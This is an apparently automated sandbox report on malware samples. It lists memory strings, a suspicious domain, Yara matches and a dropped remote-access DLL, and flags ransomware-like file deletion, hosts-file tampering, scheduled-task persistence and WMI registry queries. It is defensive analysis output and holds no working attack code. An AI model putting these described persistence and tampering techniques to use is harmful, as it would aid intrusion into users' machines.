                                Source: D1UL0FG.exe, 00000006.00000003.2591687772.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2986166870.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2601233115.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2641077930.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                Source: D1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                                Source: D1UL0FG.exe, 00000006.00000002.2996941109.000001FA2E830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                                Source: D1UL0FG.exe, 00000006.00000002.2996941109.000001FA2E830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
                                Source: 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/pi
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                                Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                                Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                                Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                                Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                                Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                                Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
                                Source: 8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                                Source: D1UL0FG.exe, 00000005.00000003.2468357425.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2468357425.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                                Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                                Source: D1UL0FG.exe, 00000006.00000003.2562812810.000001FA2E67E000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2589318835.000001FA2E686000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC48000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                                Source: D1UL0FG.exe, 00000006.00000003.2541116191.000001FA2E65D000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2544747280.000001FA2E5AB000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2542837368.000001FA2E6BB000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2527409426.000001FA2E6AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                Source: 8ZVMneG.exe, 00000054.00000003.2885763363.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                                Source: D1UL0FG.exe, 00000006.00000003.2541116191.000001FA2E65D000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2542837368.000001FA2E6BB000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2527409426.000001FA2E6AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                Source: 8ZVMneG.exe, 00000054.00000003.2885763363.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                                Source: D1UL0FG.exe, 00000006.00000003.2541116191.000001FA2E65D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                Source: 8ZVMneG.exe, 00000054.00000003.2885763363.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c
                                Source: 8ZVMneG.exe, 00000054.00000003.2885763363.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                Source: D1UL0FG.exe, 00000006.00000003.2591687772.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
                                Source: D1UL0FG.exe, 00000006.00000003.2805914031.000001FA2E6AE000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2538484447.000001FA2E639000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2638678348.000001FA2E6AE000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2806059040.000001FA2E6B3000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2581329935.000001FA2E6AE000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2996756195.000001FA2E6B5000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2559978077.000001FA2E6AE000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2597883430.000001FA2E6AE000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2985740930.000001FA2E6B5000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2642820617.000001FA2E6B3000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2527409426.000001FA2E6AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
                                Source: D1UL0FG.exe, 00000006.00000003.2572948721.000001FA2E3D3000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E3D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d390F.
                                Source: D1UL0FG.exe, 00000006.00000003.2562812810.000001FA2E5A9000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2885763363.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                                Source: D1UL0FG.exe, 00000006.00000003.2562812810.000001FA2E5A9000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2885763363.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                                Source: D1UL0FG.exe, 00000005.00000003.2468479409.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmp, D1UL0FG.exe, 00000006.00000002.3005011004.00007FF8A8AA8000.00000004.00000001.01000000.00000016.sdmpString found in binary or memory: https://www.openssl.org/H
                                Source: D1UL0FG.exe, 00000005.00000003.2467648525.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                                Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                                Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                                Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
                                Source: Yara matchFile source: 81.3.m9sfEU9.exe.31f4800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 85.2.FuturreApp.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 85.2.FuturreApp.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: m9sfEU9.exe PID: 7732, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: FuturreApp.exe PID: 1972, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Modifies existing user documents (likely ransomware behavior)
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ??\Common Files\Desktop\FACWLRWHGG.pdfJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ??\Common Files\Desktop\DTBZGIOOSO.jpgJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ??\Common Files\Desktop\DTBZGIOOSO.jpgJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ??\Common Files\Desktop\PSAMNLJHZW.pngJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ??\Common Files\Desktop\PSAMNLJHZW.pngJump to behavior
                                Modifies the hosts file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: cmd.exeProcess created: 53

                                System Summary

                                barindex
                                PE file contains section with special chars
                                Source: file.exeStatic PE information: section name:
                                Source: file.exeStatic PE information: section name: .idata
                                Source: skotes.exe.0.drStatic PE information: section name:
                                Source: skotes.exe.0.drStatic PE information: section name: .idata
                                Source: random[1].exe.3.drStatic PE information: section name:
                                Source: random[1].exe.3.drStatic PE information: section name: .idata
                                Source: random[1].exe.3.drStatic PE information: section name:
                                Source: random[3].exe.3.drStatic PE information: section name:
                                Source: random[3].exe.3.drStatic PE information: section name: .idata
                                Source: random[3].exe.3.drStatic PE information: section name:
                                Source: f8645e1e85.exe.3.drStatic PE information: section name:
                                Source: f8645e1e85.exe.3.drStatic PE information: section name: .idata
                                Source: f8645e1e85.exe.3.drStatic PE information: section name:
                                Source: random[3].exe0.3.drStatic PE information: section name:
                                Source: random[3].exe0.3.drStatic PE information: section name: .idata
                                Source: fde98a8d0b.exe.3.drStatic PE information: section name:
                                Source: fde98a8d0b.exe.3.drStatic PE information: section name: .idata
                                Source: random[4].exe0.3.drStatic PE information: section name:
                                Source: random[4].exe0.3.drStatic PE information: section name: .idata
                                Source: random[4].exe0.3.drStatic PE information: section name:
                                Source: d188864e84.exe.3.drStatic PE information: section name:
                                Source: d188864e84.exe.3.drStatic PE information: section name: .idata
                                Source: d188864e84.exe.3.drStatic PE information: section name:
                                Source: f7b3852b06.exe.3.drStatic PE information: section name:
                                Source: f7b3852b06.exe.3.drStatic PE information: section name: .idata
                                Source: f7b3852b06.exe.3.drStatic PE information: section name:
                                Source: random[1].exe1.3.drStatic PE information: section name:
                                Source: random[1].exe1.3.drStatic PE information: section name: .idata
                                Source: random[1].exe1.3.drStatic PE information: section name:
                                Source: random[2].exe.3.drStatic PE information: section name:
                                Source: random[2].exe.3.drStatic PE information: section name: .idata
                                Source: random[2].exe.3.drStatic PE information: section name:
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name:
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name: .idata
                                Source: cb947ba4b8.exe.3.drStatic PE information: section name:
                                Writes or reads registry keys via WMI
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006ACB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,3_2_006ACB97
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00265C830_2_00265C83
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026735A0_2_0026735A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A88600_2_002A8860
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00264DE00_2_00264DE0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00264B300_2_00264B30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006D88602_2_006D8860
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006D70492_2_006D7049
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006D78BB2_2_006D78BB
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006D31A82_2_006D31A8
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00694B302_2_00694B30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006D2D102_2_006D2D10
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00694DE02_2_00694DE0
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006C7F362_2_006C7F36
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006D779B2_2_006D779B
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_0069E5303_2_0069E530
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006B61923_2_006B6192
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006D88603_2_006D8860
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00694B303_2_00694B30
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006D2D103_2_006D2D10
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00694DE03_2_00694DE0
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006B0E133_2_006B0E13
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006D70493_2_006D7049
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006D31A83_2_006D31A8
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006B16023_2_006B1602
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006D779B3_2_006D779B
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006D78BB3_2_006D78BB
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006B3DF13_2_006B3DF1
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006C7F363_2_006C7F36
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AED8BD05_2_00007FF67AED8BD0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF69D45_2_00007FF67AEF69D4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF09385_2_00007FF67AEF0938
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AED10005_2_00007FF67AED1000
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE1BC05_2_00007FF67AEE1BC0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEDA34B5_2_00007FF67AEDA34B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEDAD1D5_2_00007FF67AEDAD1D
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEDA4E45_2_00007FF67AEDA4E4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF09385_2_00007FF67AEF0938
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF64885_2_00007FF67AEF6488
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF3C805_2_00007FF67AEF3C80
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE2C805_2_00007FF67AEE2C80
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF5C705_2_00007FF67AEF5C70
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE3A145_2_00007FF67AEE3A14
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE21D45_2_00007FF67AEE21D4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE19B45_2_00007FF67AEE19B4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE81545_2_00007FF67AEE8154
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEEDACC5_2_00007FF67AEEDACC
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE88045_2_00007FF67AEE8804
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE1FD05_2_00007FF67AEE1FD0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE17B05_2_00007FF67AEE17B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF97985_2_00007FF67AEF9798
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEEDF605_2_00007FF67AEEDF60
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF411C5_2_00007FF67AEF411C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF18E45_2_00007FF67AEF18E4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AED98705_2_00007FF67AED9870
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE36105_2_00007FF67AEE3610
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEEE5E05_2_00007FF67AEEE5E0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE1DC45_2_00007FF67AEE1DC4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE5DA05_2_00007FF67AEE5DA0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEE9F105_2_00007FF67AEE9F10
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF5EEC5_2_00007FF67AEF5EEC
